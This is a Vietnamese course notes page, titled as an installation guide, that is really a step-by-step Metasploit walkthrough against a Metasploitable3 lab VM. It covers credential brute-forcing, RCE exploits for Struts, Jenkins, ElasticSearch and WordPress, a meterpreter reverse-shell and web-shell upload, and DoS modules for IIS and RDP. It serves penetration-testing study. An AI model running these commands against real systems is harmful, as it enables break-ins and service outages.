Hướng dẫn cài đặt và sử dụng Glassfish - Nguyên lý hệ điều hành - Học Viện Kỹ Thuật Mật Mã

Hướng dẫn cài đặt các ứng dụng Glassfish, Apache Struts, Tomcat để thêm các thư viện lập trình mới nhất. Tài liệu giúp bạn tham khảo và đạt kết quả tốt. Mời bạn đọc đón xem!

lOMoARcPSD|4 7892172
I. Glassfish
1. Login port 4848
- msfconsole
- search glass
- use auxiliary/scanner/http/glassfish_login
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- set stop_on_success true
- set rhosts 192.168.228.132
- set username ""
- run
2. Glassfish - CVE-2011-0807
II. Apache Struts 8282
1. Apache axis2 login
- msfconsole
- use auxiliary/scanner/http/axis_login
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- set stop_on_success true
- set rhosts 192.168.228.132
- set rport 8282
- run
2. Apache axis2 exploit
- use exploit/multi/http/axis2_deployer
lOMoARcPSD|4 7892172
- set rhosts 192.168.228.132
- set rport 8282
- run
2. Apache struts
- use exploit/multi/http/struts_dmi_rest_exec
- set rhosts 192.168.228.132
- set rport 8282
- run
III. Tomcat
1. Tomcat_enum Username của tomcat
- use auxiliary/scanner/http/tomcat_enum
- set rhosts 192.168.228.132
- set rport 8282
- set targeturi /manager
- run
2. Tomcat_login
- use auxiliary/scanner/http/tomcat_mgr_login
- set userpass_file ""
- set rhosts 192.168.228.132
- set rport 8282
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- set stop_on_success true
- run
3. Tomcat upload
- use exploit/multi/http/tomcat_mgr_upload
lOMoARcPSD|4 7892172
- set rhosts 192.168.228.132
- set rport 8282
- set httppassword sploit
- set httpusername sploit
- set target 1
- set payload payload/windows/meterpreter/reverse_tcp
- run
IV.Jenkins - 8484
1. jenkins_script_console
- use exploit/multi/http/jenkins_script_console
- set rhosts 192.168.228.132
- set rport 8484
- set targeturi /
- run
V.IIS-FTP - 21
- use auxiliary/scanner/ftp/ftp_login
- set rhosts 192.168.228.132
- set rport 21
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- run
Sau đó thể sử dụng mk để tấn công
- dotdotpwn -m ftp -o windows -U Administrator -P vagrant -h
192.168.228.132
lOMoARcPSD|4 7892172
VI. IIS HTTP - 80
- use auxiliary/dos/http/ms15_034_ulonglongadd
- set rhosts 192.168.228.132
- run
Tấn công DoS làm sập web server
VII. psexec-445
Cổng không mở
VIII. SSH-22
- use auxiliary/scanner/ssh/ssh_login
- set rhosts 192.168.228.132
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- set verbose true
-run
IX. WinRM - 5985
1. Quét cổng WinRM
- use auxiliary/scanner/winrm/winrm_auth_methods
- set rhosts 192.168.228.132
- run
2. Login
- use auxiliary/scanner/winrm/winrm_login
- set rhosts 192.168.228.132
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass
- set password pass
lOMoARcPSD|4 7892172
- run
3. Truy vấn WQL
-> Lấy thông tin kiến trúc hệ thống
- use auxiliary/scanner/winrm/winrm_wql
- set rhosts 192.168.228.132
- set username vagrant
- set password vagrant
- run
4. Truy vấn với winrs cmd
- use auxiliary/scanner/winrm/winrm_cmd
- set rhosts 192.168.228.132
- set username vagrant
- set password vagrant
- run
5. Thực hiện script exploit
- use exploits/windows/winrm/winrm_script_exec
- set rhosts 192.168.228.132
- set username vagrant
- set password vagrant
- run
X. chinese caidao - 80
- use auxiliary/scanner/http/caidao_bruteforce_login
- set rhosts 192.168.228.132
- run
lOMoARcPSD|4 7892172
XI. ManageEngine 8020
*Cổng đóng
- use exploit/windows/http/manageengine_connectionid_write
- set rhosts 192.168.228.132
- run
XII. ElasticSearch-9200
- use exploit/multi/elasticsearch/script_mvel_rce
- set rhosts 192.168.228.132
- run
XIII. Apache Axis2 (Xem phần II)
XIV.WebDAV - 8585
Upload file
- use auxiliary/scanner/http/http_put
- set rhosts 192.168.228.132
- set rport 8585
- set filename meterpreter.php
- set path /uploads
- run
XV.SNMP 161
Lấy thông tin của hệ thống
- use auxiliary/scanner/snmp/snmp_enum
- set rhosts 192.168.228.132
- run
XVI. MySQL - 3306
*Cổng không mở
lOMoARcPSD|4 7892172
XVII. JMX - 1617
- use multi/misc/java_jmx_server
- set rhosts 192.168.228.132
- set rport 1617
- run
XVIII. Wordpress - 8585
- use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
- set rhosts 192.168.228.132
- set rport 8585
- set targeturi /wordpress/
- set form_path /index.php/king-of-hearts/
- run
XIX. Remote Desktop
Tấn công DoS
- use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
- set rhosts 192.168.228.132
- run
XX. PHPMyAdmin
*Forbidden
XXI. Ruby on Rails
*Cổng không mở
| 1/7

Preview text:

lOMoARcPSD|47892172 I. Glassfish 1. Login – port 4848 - msfconsole - search glass
- use auxiliary/scanner/http/glassfish_login
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass - set stop_on_success true - set rhosts 192.168.228.132 - set username "" - run
2. Glassfish - CVE-2011-0807 II. Apache Struts – 8282 1. Apache axis2 login - msfconsole
- use auxiliary/scanner/http/axis_login
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass - set stop_on_success true - set rhosts 192.168.228.132 - set rport 8282 - run 2. Apache axis2 exploit
- use exploit/multi/http/axis2_deployer lOMoARcPSD|47892172 - set rhosts 192.168.228.132 - set rport 8282 - run 2. Apache struts
- use exploit/multi/http/struts_dmi_rest_exec - set rhosts 192.168.228.132 - set rport 8282 - run III. Tomcat
1. Tomcat_enum – Username của tomcat
- use auxiliary/scanner/http/tomcat_enum - set rhosts 192.168.228.132 - set rport 8282 - set targeturi /manager - run 2. Tomcat_login
- use auxiliary/scanner/http/tomcat_mgr_login - set userpass_file "" - set rhosts 192.168.228.132 - set rport 8282
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass - set stop_on_success true - run 3. Tomcat upload
- use exploit/multi/http/tomcat_mgr_upload lOMoARcPSD|47892172 - set rhosts 192.168.228.132 - set rport 8282 - set httppassword sploit - set httpusername sploit - set target 1
- set payload payload/windows/meterpreter/reverse_tcp - run IV.Jenkins - 8484 1. jenkins_script_console
- use exploit/multi/http/jenkins_script_console - set rhosts 192.168.228.132 - set rport 8484 - set targeturi / - run V.IIS-FTP - 21
- use auxiliary/scanner/ftp/ftp_login - set rhosts 192.168.228.132 - set rport 21
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass - run
Sau đó có thể sử dụng mk để tấn công
- dotdotpwn -m ftp -o windows -U Administrator -P vagrant -h 192.168.228.132 lOMoARcPSD|47892172 VI. IIS – HTTP - 80
- use auxiliary/dos/http/ms15_034_ulonglongadd - set rhosts 192.168.228.132 - run
Tấn công DoS làm sập web server VII. psexec-445 Cổng không mở VIII. SSH-22
- use auxiliary/scanner/ssh/ssh_login - set rhosts 192.168.228.132
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass - set verbose true -run IX. WinRM - 5985 1. Quét cổng có WinRM
- use auxiliary/scanner/winrm/winrm_auth_methods - set rhosts 192.168.228.132 - run 2. Login
- use auxiliary/scanner/winrm/winrm_login - set rhosts 192.168.228.132
- set user_file /home/kali/ATHDH/metasploitable3/user
- set pass_file /home/kali/ATHDH/metasploitable3/pass - set password pass lOMoARcPSD|47892172 - run 3. Truy vấn WQL
-> Lấy thông tin kiến trúc hệ thống
- use auxiliary/scanner/winrm/winrm_wql - set rhosts 192.168.228.132 - set username vagrant - set password vagrant - run
4. Truy vấn với winrs cmd
- use auxiliary/scanner/winrm/winrm_cmd - set rhosts 192.168.228.132 - set username vagrant - set password vagrant - run
5. Thực hiện script exploit
- use exploits/windows/winrm/winrm_script_exec - set rhosts 192.168.228.132 - set username vagrant - set password vagrant - run X. chinese caidao - 80
- use auxiliary/scanner/http/caidao_bruteforce_login - set rhosts 192.168.228.132 - run lOMoARcPSD|47892172 XI. ManageEngine – 8020 *Cổng đóng
- use exploit/windows/http/manageengine_connectionid_write - set rhosts 192.168.228.132 - run XII. ElasticSearch-9200
- use exploit/multi/elasticsearch/script_mvel_rce - set rhosts 192.168.228.132 - run
XIII. Apache Axis2 (Xem phần II) XIV.WebDAV - 8585 Upload file
- use auxiliary/scanner/http/http_put - set rhosts 192.168.228.132 - set rport 8585 - set filename meterpreter.php - set path /uploads - run XV.SNMP – 161
Lấy thông tin của hệ thống
- use auxiliary/scanner/snmp/snmp_enum - set rhosts 192.168.228.132 - run XVI. MySQL - 3306 *Cổng không mở lOMoARcPSD|47892172 XVII. JMX - 1617
- use multi/misc/java_jmx_server - set rhosts 192.168.228.132 - set rport 1617 - run XVIII. Wordpress - 8585
- use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload - set rhosts 192.168.228.132 - set rport 8585 - set targeturi /wordpress/
- set form_path /index.php/king-of-hearts/ - run XIX. Remote Desktop Tấn công DoS
- use auxiliary/dos/windows/rdp/ms12_020_maxchannelids - set rhosts 192.168.228.132 - run XX. PHPMyAdmin *Forbidden XXI. Ruby on Rails *Cổng không mở
Document Outline

  • I.Glassfish
    • 1.Login – port 4848
  • II.Apache Struts – 8282
    • 1.Apache axis2 login
    • 2.Apache axis2 exploit
    • 2. Apache struts
  • III.Tomcat
    • 1.Tomcat_enum – Username của tomcat
    • 2.Tomcat_login
    • 3.Tomcat upload
  • IV.Jenkins - 8484
    • 1. jenkins_script_console
  • V.IIS-FTP - 21
  • VI.IIS – HTTP - 80
  • VII.psexec-445
  • VIII.SSH-22
  • IX.WinRM - 5985
    • 1.Quét cổng có WinRM
    • 2.Login
    • 3.Truy vấn WQL
    • 4.Truy vấn với winrs cmd
    • 5.Thực hiện script exploit
  • X.chinese caidao - 80
  • XI.ManageEngine – 8020
  • XII.ElasticSearch-9200
  • XIII.Apache Axis2 (Xem phần II)
  • XV.SNMP – 161
  • XVI.MySQL - 3306
  • XVII.JMX - 1617
  • XVIII.Wordpress - 8585
  • XIX.Remote Desktop
  • XX.PHPMyAdmin
  • XXI.Ruby on Rails